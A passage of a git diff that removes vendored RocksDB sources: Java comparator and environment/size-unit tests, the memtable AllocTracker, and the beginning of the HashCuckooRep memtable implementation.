-   */
-  @Test
-  public void java_vs_java_bytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir, new BytewiseComparator(
-          new ComparatorOptions()))) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new BytewiseComparator(new ComparatorOptions())),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the C++ BytewiseComparatorImpl
-   * and test the results against our Java DirectBytewiseComparator
-   */
-  @Test
-  public void java_vs_cpp_directBytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir,
-          BuiltinComparator.BYTEWISE_COMPARATOR)) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new DirectBytewiseComparator(
-                new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the Java DirectBytewiseComparator
-   * and test the results against another Java DirectBytewiseComparator
-   */
-  @Test
-  public void java_vs_java_directBytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir, new DirectBytewiseComparator(
-            new ComparatorOptions()))) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new DirectBytewiseComparator(
-                new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the C++ ReverseBytewiseComparatorImpl
-   * and test the results against our Java ReverseBytewiseComparator
-   */
-  @Test
-  public void java_vs_cpp_reverseBytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir,
-          BuiltinComparator.REVERSE_BYTEWISE_COMPARATOR)) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(
-                new ReverseBytewiseComparator(new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the Java ReverseBytewiseComparator
-   * and test the results against another Java ReverseBytewiseComparator
-   */
-  @Test
-  public void java_vs_java_reverseBytewiseComparator()
-      throws IOException, RocksDBException {
-
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir, new ReverseBytewiseComparator(
-            new ComparatorOptions()))) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(
-                new ReverseBytewiseComparator(new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  private void doRandomIterationTest(
-      final RocksDB db, final java.util.Comparator<String> javaComparator,
-      final List<String> source_strings, final Random rnd,
-      final int num_writes, final int num_iter_ops,
-      final int num_trigger_flush) throws RocksDBException {
-
-    final TreeMap<String, String> map = new TreeMap<>(javaComparator);
-
-    for (int i = 0; i < num_writes; i++) {
-      if (num_trigger_flush > 0 && i != 0 && i % num_trigger_flush == 0) {
-        db.flush(new FlushOptions());
-      }
-
-      final int type = rnd.nextInt(2);
-      final int index = rnd.nextInt(source_strings.size());
-      final String key = source_strings.get(index);
-      switch (type) {
-        case 0:
-          // put
-          map.put(key, key);
-          db.put(new WriteOptions(), bytes(key), bytes(key));
-          break;
-        case 1:
-          // delete
-          if (map.containsKey(key)) {
-            map.remove(key);
-          }
-          db.remove(new WriteOptions(), bytes(key));
-          break;
-
-        default:
-          fail("Should not be able to generate random outside range 1..2");
-      }
-    }
-
-    try(final RocksIterator iter = db.newIterator(new ReadOptions())) {
-      final KVIter<String, String> result_iter = new KVIter(map);
-
-      boolean is_valid = false;
-      for (int i = 0; i < num_iter_ops; i++) {
-        // Random walk and make sure iter and result_iter returns the
-        // same key and value
-        final int type = rnd.nextInt(6);
-        iter.status();
-        switch (type) {
-          case 0:
-            // Seek to First
-            iter.seekToFirst();
-            result_iter.seekToFirst();
-            break;
-          case 1:
-            // Seek to last
-            iter.seekToLast();
-            result_iter.seekToLast();
-            break;
-          case 2: {
-            // Seek to random key
-            final int key_idx = rnd.nextInt(source_strings.size());
-            final String key = source_strings.get(key_idx);
-            iter.seek(bytes(key));
-            result_iter.seek(bytes(key));
-            break;
-          }
-          case 3:
-            // Next
-            if (is_valid) {
-              iter.next();
-              result_iter.next();
-            } else {
-              continue;
-            }
-            break;
-          case 4:
-            // Prev
-            if (is_valid) {
-              iter.prev();
-              result_iter.prev();
-            } else {
-              continue;
-            }
-            break;
-          default: {
-            assert (type == 5);
-            final int key_idx = rnd.nextInt(source_strings.size());
-            final String key = source_strings.get(key_idx);
-            final byte[] result = db.get(new ReadOptions(), bytes(key));
-            if (!map.containsKey(key)) {
-              assertNull(result);
-            } else {
-              assertArrayEquals(bytes(map.get(key)), result);
-            }
-            break;
-          }
-        }
-
-        assertEquals(result_iter.isValid(), iter.isValid());
-
-        is_valid = iter.isValid();
-
-        if (is_valid) {
-          assertArrayEquals(bytes(result_iter.key()), iter.key());
-
-          //note that calling value on a non-valid iterator from the Java API
-          //results in a SIGSEGV
-          assertArrayEquals(bytes(result_iter.value()), iter.value());
-        }
-      }
-    }
-  }
-
-  /**
-   * Open the database using a C++ Comparator
-   */
-  private RocksDB openDatabase(
-      final Path dbDir, final BuiltinComparator cppComparator)
-      throws IOException, RocksDBException {
-    final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setComparator(cppComparator);
-    return RocksDB.open(options, dbDir.toAbsolutePath().toString());
-  }
-
-  /**
-   * Open the database using a Java Comparator
-   */
-  private RocksDB openDatabase(
-      final Path dbDir,
-      final AbstractComparator<? extends AbstractSlice<?>> javaComparator)
-      throws IOException, RocksDBException {
-    final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setComparator(javaComparator);
-    return RocksDB.open(options, dbDir.toAbsolutePath().toString());
-  }
-
-  private void closeDatabase(final RocksDB db) {
-    db.close();
-  }
-
-  private void removeData(final Path dbDir) throws IOException {
-    Files.walkFileTree(dbDir, new SimpleFileVisitor<Path>() {
-      @Override
-      public FileVisitResult visitFile(
-          final Path file, final BasicFileAttributes attrs)
-          throws IOException {
-        Files.delete(file);
-        return FileVisitResult.CONTINUE;
-      }
-
-      @Override
-      public FileVisitResult postVisitDirectory(
-          final Path dir, final IOException exc) throws IOException {
-        Files.delete(dir);
-        return FileVisitResult.CONTINUE;
-      }
-    });
-  }
-
-  private byte[] bytes(final String s) {
-    return s.getBytes(StandardCharsets.UTF_8);
-  }
-
-  private java.util.Comparator<String> toJavaComparator(
-      final Comparator rocksComparator) {
-    return new java.util.Comparator<String>() {
-      @Override
-      public int compare(final String s1, final String s2) {
-        return rocksComparator.compare(new Slice(s1), new Slice(s2));
-      }
-    };
-  }
-
-  private java.util.Comparator<String> toJavaComparator(
-      final DirectComparator rocksComparator) {
-    return new java.util.Comparator<String>() {
-      @Override
-      public int compare(final String s1, final String s2) {
-        return rocksComparator.compare(new DirectSlice(s1),
-            new DirectSlice(s2));
-      }
-    };
-  }
-
-  private class KVIter<K, V> implements RocksIteratorInterface {
-
-    private final List<Map.Entry<K, V>> entries;
-    private final java.util.Comparator<? super K> comparator;
-    private int offset = -1;
-
-    private int lastPrefixMatchIdx = -1;
-    private int lastPrefixMatch = 0;
-
-    public KVIter(final TreeMap<K, V> map) {
-      this.entries = new ArrayList<>();
-      final Iterator<Map.Entry<K, V>> iterator = map.entrySet().iterator();
-      while(iterator.hasNext()) {
-        entries.add(iterator.next());
-      }
-      this.comparator = map.comparator();
-    }
-
-
-    @Override
-    public boolean isValid() {
-      return offset > -1 && offset < entries.size();
-    }
-
-    @Override
-    public void seekToFirst() {
-      offset = 0;
-    }
-
-    @Override
-    public void seekToLast() {
-      offset = entries.size() - 1;
-    }
-
-    @Override
-    public void seek(final byte[] target) {
-      for(offset = 0; offset < entries.size(); offset++) {
-        if(comparator.compare(entries.get(offset).getKey(),
-            (K)new String(target, StandardCharsets.UTF_8)) >= 0) {
-          return;
-        }
-      }
-    }
-
-    /**
-     * Is `a` a prefix of `b`
-     *
-     * @return The length of the matching prefix, or 0 if it is not a prefix
-     */
-    private int isPrefix(final byte[] a, final byte[] b) {
-      if(b.length >= a.length) {
-        for(int i = 0; i < a.length; i++) {
-          if(a[i] != b[i]) {
-            return i;
-          }
-        }
-        return a.length;
-      } else {
-        return 0;
-      }
-    }
-
-    @Override
-    public void next() {
-      if(offset < entries.size()) {
-        offset++;
-      }
-    }
-
-    @Override
-    public void prev() {
-      if(offset >= 0) {
-        offset--;
-      }
-    }
-
-    @Override
-    public void status() throws RocksDBException {
-      if(offset < 0 || offset >= entries.size()) {
-        throw new RocksDBException("Index out of bounds. Size is: " +
-            entries.size() + ", offset is: " + offset);
-      }
-    }
-
-    public K key() {
-      if(!isValid()) {
-        if(entries.isEmpty()) {
-          return (K)"";
-        } else if(offset == -1){
-          return entries.get(0).getKey();
-        } else if(offset == entries.size()) {
-          return entries.get(offset - 1).getKey();
-        } else {
-          return (K)"";
-        }
-      } else {
-        return entries.get(offset).getKey();
-      }
-    }
-
-    public V value() {
-      if(!isValid()) {
-        return (V)"";
-      } else {
-        return entries.get(offset).getValue();
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/EnvironmentTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
deleted file mode 100644
index 28ee047..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
+++ /dev/null
@@ -1,172 +0,0 @@
-// Copyright (c) 2014, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb.util;
-
-import org.junit.AfterClass;
-import org.junit.BeforeClass;
-import org.junit.Test;
-
-import java.lang.reflect.Field;
-import java.lang.reflect.Modifier;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class EnvironmentTest {
-  private final static String ARCH_FIELD_NAME = "ARCH";
-  private final static String OS_FIELD_NAME = "OS";
-
-  private static String INITIAL_OS;
-  private static String INITIAL_ARCH;
-
-  @BeforeClass
-  public static void saveState() {
-    INITIAL_ARCH = getEnvironmentClassField(ARCH_FIELD_NAME);
-    INITIAL_OS = getEnvironmentClassField(OS_FIELD_NAME);
-  }
-
-  @Test
-  public void mac32() {
-    setEnvironmentClassFields("mac", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".jnilib");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-osx.jnilib");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.dylib");
-  }
-
-  @Test
-  public void mac64() {
-    setEnvironmentClassFields("mac", "64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".jnilib");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-osx.jnilib");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.dylib");
-  }
-
-  @Test
-  public void nix32() {
-    // Linux
-    setEnvironmentClassFields("Linux", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux32.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-    // UNIX
-    setEnvironmentClassFields("Unix", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux32.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-  }
-
-  @Test(expected = UnsupportedOperationException.class)
-  public void aix32() {
-    // AIX
-    setEnvironmentClassFields("aix", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    Environment.getJniLibraryFileName("rocksdb");
-  }
-
-  @Test
-  public void nix64() {
-    setEnvironmentClassFields("Linux", "x64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux64.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-    // UNIX
-    setEnvironmentClassFields("Unix", "x64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux64.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-    // AIX
-    setEnvironmentClassFields("aix", "x64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-aix64.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-  }
-
-  @Test
-  public void detectWindows(){
-    setEnvironmentClassFields("win", "x64");
-    assertThat(Environment.isWindows()).isTrue();
-  }
-
-  @Test
-  public void win64() {
-    setEnvironmentClassFields("win", "x64");
-    assertThat(Environment.isWindows()).isTrue();
-    assertThat(Environment.getJniLibraryExtension()).
-      isEqualTo(".dll");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-      isEqualTo("librocksdbjni-win64.dll");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-      isEqualTo("librocksdbjni.dll");
-  }
-
-  private void setEnvironmentClassFields(String osName,
-      String osArch) {
-    setEnvironmentClassField(OS_FIELD_NAME, osName);
-    setEnvironmentClassField(ARCH_FIELD_NAME, osArch);
-  }
-
-  @AfterClass
-  public static void restoreState() {
-    setEnvironmentClassField(OS_FIELD_NAME, INITIAL_OS);
-    setEnvironmentClassField(ARCH_FIELD_NAME, INITIAL_ARCH);
-  }
-
-  private static String getEnvironmentClassField(String fieldName) {
-    final Field field;
-    try {
-      field = Environment.class.getDeclaredField(fieldName);
-      field.setAccessible(true);
-      final Field modifiersField = Field.class.getDeclaredField("modifiers");
-      modifiersField.setAccessible(true);
-      modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
-      return (String)field.get(null);
-    } catch (NoSuchFieldException | IllegalAccessException e) {
-      throw new RuntimeException(e);
-    }
-  }
-
-  private static void setEnvironmentClassField(String fieldName, String value) {
-    final Field field;
-    try {
-      field = Environment.class.getDeclaredField(fieldName);
-      field.setAccessible(true);
-      final Field modifiersField = Field.class.getDeclaredField("modifiers");
-      modifiersField.setAccessible(true);
-      modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
-      field.set(null, value);
-    } catch (NoSuchFieldException | IllegalAccessException e) {
-      throw new RuntimeException(e);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/SizeUnitTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
deleted file mode 100644
index 990aa5f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb.util;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class SizeUnitTest {
-
-  public static final long COMPUTATION_UNIT = 1024L;
-
-  @Test
-  public void sizeUnit() {
-    assertThat(SizeUnit.KB).isEqualTo(COMPUTATION_UNIT);
-    assertThat(SizeUnit.MB).isEqualTo(
-        SizeUnit.KB * COMPUTATION_UNIT);
-    assertThat(SizeUnit.GB).isEqualTo(
-        SizeUnit.MB * COMPUTATION_UNIT);
-    assertThat(SizeUnit.TB).isEqualTo(
-        SizeUnit.GB * COMPUTATION_UNIT);
-    assertThat(SizeUnit.PB).isEqualTo(
-        SizeUnit.TB * COMPUTATION_UNIT);
-  }
-}
diff --git a/thirdparty/rocksdb/memtable/alloc_tracker.cc b/thirdparty/rocksdb/memtable/alloc_tracker.cc
deleted file mode 100644
index 9889cc4..0000000
--- a/thirdparty/rocksdb/memtable/alloc_tracker.cc
+++ /dev/null
@@ -1,59 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <assert.h>
-#include "rocksdb/write_buffer_manager.h"
-#include "util/allocator.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-AllocTracker::AllocTracker(WriteBufferManager* write_buffer_manager)
-    : write_buffer_manager_(write_buffer_manager),
-      bytes_allocated_(0),
-      done_allocating_(false),
-      freed_(false) {}
-
-AllocTracker::~AllocTracker() { FreeMem(); }
-
-void AllocTracker::Allocate(size_t bytes) {
-  assert(write_buffer_manager_ != nullptr);
-  if (write_buffer_manager_->enabled()) {
-    bytes_allocated_.fetch_add(bytes, std::memory_order_relaxed);
-    write_buffer_manager_->ReserveMem(bytes);
-  }
-}
-
-void AllocTracker::DoneAllocating() {
-  if (write_buffer_manager_ != nullptr && !done_allocating_) {
-    if (write_buffer_manager_->enabled()) {
-      write_buffer_manager_->ScheduleFreeMem(
-          bytes_allocated_.load(std::memory_order_relaxed));
-    } else {
-      assert(bytes_allocated_.load(std::memory_order_relaxed) == 0);
-    }
-    done_allocating_ = true;
-  }
-}
-
-void AllocTracker::FreeMem() {
-  if (!done_allocating_) {
-    DoneAllocating();
-  }
-  if (write_buffer_manager_ != nullptr && !freed_) {
-    if (write_buffer_manager_->enabled()) {
-      write_buffer_manager_->FreeMem(
-          bytes_allocated_.load(std::memory_order_relaxed));
-    } else {
-      assert(bytes_allocated_.load(std::memory_order_relaxed) == 0);
-    }
-    freed_ = true;
-  }
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.cc b/thirdparty/rocksdb/memtable/hash_cuckoo_rep.cc
deleted file mode 100644
index 034bf58..0000000
--- a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.cc
+++ /dev/null
@@ -1,660 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#include "memtable/hash_cuckoo_rep.h"
-
-#include <algorithm>
-#include <atomic>
-#include <limits>
-#include <memory>
-#include <queue>
-#include <string>
-#include <vector>
-
-#include "db/memtable.h"
-#include "memtable/skiplist.h"
-#include "memtable/stl_wrappers.h"
-#include "port/port.h"
-#include "rocksdb/memtablerep.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace {
-
-// the default maximum size of the cuckoo path searching queue
-static const int kCuckooPathMaxSearchSteps = 100;
-
-struct CuckooStep {
-  static const int kNullStep = -1;
-  // the bucket id in the cuckoo array.
-  int bucket_id_;
-  // index of cuckoo-step array that points to its previous step,
-  // -1 if it the beginning step.
-  int prev_step_id_;
-  // the depth of the current step.
-  unsigned int depth_;
-
-  CuckooStep() : bucket_id_(-1), prev_step_id_(kNullStep), depth_(1) {}
-
-  CuckooStep(CuckooStep&& o) = default;
-
-  CuckooStep& operator=(CuckooStep&& rhs) {
-    bucket_id_ = std::move(rhs.bucket_id_);
-    prev_step_id_ = std::move(rhs.prev_step_id_);
-    depth_ = std::move(rhs.depth_);
-    return *this;
-  }
-
-  CuckooStep(const CuckooStep&) = delete;
-  CuckooStep& operator=(const CuckooStep&) = delete;
-
-  CuckooStep(int bucket_id, int prev_step_id, int depth)
-      : bucket_id_(bucket_id), prev_step_id_(prev_step_id), depth_(depth) {}
-};
-
-class HashCuckooRep : public MemTableRep {
- public:
-  explicit HashCuckooRep(const MemTableRep::KeyComparator& compare,
-                         Allocator* allocator, const size_t bucket_count,
-                         const unsigned int hash_func_count,
-                         const size_t approximate_entry_size)
-      : MemTableRep(allocator),
-        compare_(compare),
-        allocator_(allocator),
-        bucket_count_(bucket_count),
-        approximate_entry_size_(approximate_entry_size),
-        cuckoo_path_max_depth_(kDefaultCuckooPathMaxDepth),
-        occupied_count_(0),
-        hash_function_count_(hash_func_count),
-        backup_table_(nullptr) {
-    char* mem = reinterpret_cast<char*>(
-        allocator_->Allocate(sizeof(std::atomic<const char*>) * bucket_count_));
-    cuckoo_array_ = new (mem) std::atomic<char*>[bucket_count_];
-    for (unsigned int bid = 0; bid < bucket_count_; ++bid) {
-      cuckoo_array_[bid].store(nullptr, std::memory_order_relaxed);
-    }
-
-    cuckoo_path_ = reinterpret_cast<int*>(
-        allocator_->Allocate(sizeof(int) * (cuckoo_path_max_depth_ + 1)));
-    is_nearly_full_ = false;
-  }
-
-  // return false, indicating HashCuckooRep does not support merge operator.
-  virtual bool IsMergeOperatorSupported() const override { return false; }
-
-  // return false, indicating HashCuckooRep does not support snapshot.
-  virtual bool IsSnapshotSupported() const override { return false; }
-
-  // Returns true iff an entry that compares equal to key is in the collection.
-  virtual bool Contains(const char* internal_key) const override;
-
-  virtual ~HashCuckooRep() override {}
-
-  // Insert the specified key (internal_key) into the mem-table.  Assertion
-  // fails if
-  // the current mem-table already contains the specified key.
-  virtual void Insert(KeyHandle handle) override;
-
-  // This function returns bucket_count_ * approximate_entry_size_ when any
-  // of the followings happen to disallow further write operations:
-  // 1. when the fullness reaches kMaxFullnes.
-  // 2. when the backup_table_ is used.
-  //
-  // otherwise, this function will always return 0.
-  virtual size_t ApproximateMemoryUsage() override {
-    if (is_nearly_full_) {
-      return bucket_count_ * approximate_entry_size_;
-    }
-    return 0;
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  class Iterator : public MemTableRep::Iterator {
-    std::shared_ptr<std::vector<const char*>> bucket_;
-    std::vector<const char*>::const_iterator mutable cit_;
-    const KeyComparator& compare_;
-    std::string tmp_;  // For passing to EncodeKey
-    bool mutable sorted_;
-    void DoSort() const;
-
-   public:
-    explicit Iterator(std::shared_ptr<std::vector<const char*>> bucket,
-                      const KeyComparator& compare);
-
-    // Initialize an iterator over the specified collection.
-    // The returned iterator is not valid.
-    // explicit Iterator(const MemTableRep* collection);
-    virtual ~Iterator() override{};
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override;
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override;
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& user_key, const char* memtable_key) override;
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override;
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override;
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override;
-  };
-
-  struct CuckooStepBuffer {
-    CuckooStepBuffer() : write_index_(0), read_index_(0) {}
-    ~CuckooStepBuffer() {}
-
-    int write_index_;
-    int read_index_;
-    CuckooStep steps_[kCuckooPathMaxSearchSteps];
-
-    CuckooStep& NextWriteBuffer() { return steps_[write_index_++]; }
-
-    inline const CuckooStep& ReadNext() { return steps_[read_index_++]; }
-
-    inline bool HasNewWrite() { return write_index_ > read_index_; }
-
-    inline void reset() {
-      write_index_ = 0;
-      read_index_ = 0;
-    }
-
-    inline bool IsFull() { return write_index_ >= kCuckooPathMaxSearchSteps; }
-
-    // returns the number of steps that has been read
-    inline int ReadCount() { return read_index_; }
-
-    // returns the number of steps that has been written to the buffer.
-    inline int WriteCount() { return write_index_; }
-  };
-
- private:
-  const MemTableRep::KeyComparator& compare_;
-  // the pointer to Allocator to allocate memory, immutable after construction.
-  Allocator* const allocator_;
-  // the number of hash bucket in the hash table.
-  const size_t bucket_count_;
-  // approximate size of each entry
-  const size_t approximate_entry_size_;
-  // the maxinum depth of the cuckoo path.
-  const unsigned int cuckoo_path_max_depth_;
-  // the current number of entries in cuckoo_array_ which has been occupied.
-  size_t occupied_count_;
-  // the current number of hash functions used in the cuckoo hash.
-  unsigned int hash_function_count_;
-  // the backup MemTableRep to handle the case where cuckoo hash cannot find
-  // a vacant bucket for inserting the key of a put request.
-  std::shared_ptr<MemTableRep> backup_table_;
-  // the array to store pointers, pointing to the actual data.
-  std::atomic<char*>* cuckoo_array_;
-  // a buffer to store cuckoo path
-  int* cuckoo_path_;
-  // a boolean flag indicating whether the fullness of bucket array
-  // reaches the point to make the current memtable immutable.
-  bool is_nearly_full_;
-
-  // the default maximum depth of the cuckoo path.
-  static const unsigned int kDefaultCuckooPathMaxDepth = 10;
-
-  CuckooStepBuffer step_buffer_;
-
-  // returns the bucket id assogied to the input slice based on the
-  unsigned int GetHash(const Slice& slice, const int hash_func_id) const {
-    // the seeds used in the Murmur hash to produce different hash functions.
-    static const int kMurmurHashSeeds[HashCuckooRepFactory::kMaxHashCount] = {
-        545609244,  1769731426, 763324157,  13099088,   592422103,
-        1899789565, 248369300,  1984183468, 1613664382, 1491157517};
-    return static_cast<unsigned int>(
-        MurmurHash(slice.data(), static_cast<int>(slice.size()),
-                   kMurmurHashSeeds[hash_func_id]) %
-        bucket_count_);
-  }
-
-  // A cuckoo path is a sequence of bucket ids, where each id points to a
-  // location of cuckoo_array_.  This path describes the displacement sequence
-  // of entries in order to store the desired data specified by the input user
-  // key.  The path starts from one of the locations associated with the
-  // specified user key and ends at a vacant space in the cuckoo array. This
-  // function will update the cuckoo_path.
-  //
-  // @return true if it found a cuckoo path.
-  bool FindCuckooPath(const char* internal_key, const Slice& user_key,
-                      int* cuckoo_path, size_t* cuckoo_path_length,
-                      int initial_hash_id = 0);
-
-  // Perform quick insert by checking whether there is a vacant bucket in one
-  // of the possible locations of the input key.  If so, then the function will
-  // return true and the key will be stored in that vacant bucket.
-  //
-  // This function is a helper function of FindCuckooPath that discovers the
-  // first possible steps of a cuckoo path.  It begins by first computing
-  // the possible locations of the input keys (and stores them in bucket_ids.)
-  // Then, if one of its possible locations is vacant, then the input key will
-  // be stored in that vacant space and the function will return true.
-  // Otherwise, the function will return false indicating a complete search
-  // of cuckoo-path is needed.
-  bool QuickInsert(const char* internal_key, const Slice& user_key,
-                   int bucket_ids[], const int initial_hash_id);
-
-  // Returns the pointer to the internal iterator to the buckets where buckets
-  // are sorted according to the user specified KeyComparator.  Note that
-  // any insert after this function call may affect the sorted nature of
-  // the returned iterator.
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena) override {
-    std::vector<const char*> compact_buckets;
-    for (unsigned int bid = 0; bid < bucket_count_; ++bid) {
-      const char* bucket = cuckoo_array_[bid].load(std::memory_order_relaxed);
-      if (bucket != nullptr) {
-        compact_buckets.push_back(bucket);
-      }
-    }
-    MemTableRep* backup_table = backup_table_.get();
-    if (backup_table != nullptr) {
-      std::unique_ptr<MemTableRep::Iterator> iter(backup_table->GetIterator());
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        compact_buckets.push_back(iter->key());
-      }
-    }
-    if (arena == nullptr) {
-      return new Iterator(
-          std::shared_ptr<std::vector<const char*>>(
-              new std::vector<const char*>(std::move(compact_buckets))),
-          compare_);
-    } else {
-      auto mem = arena->AllocateAligned(sizeof(Iterator));
-      return new (mem) Iterator(
-          std::shared_ptr<std::vector<const char*>>(
-              new std::vector<const char*>(std::move(compact_buckets))),
-          compare_);
-    }
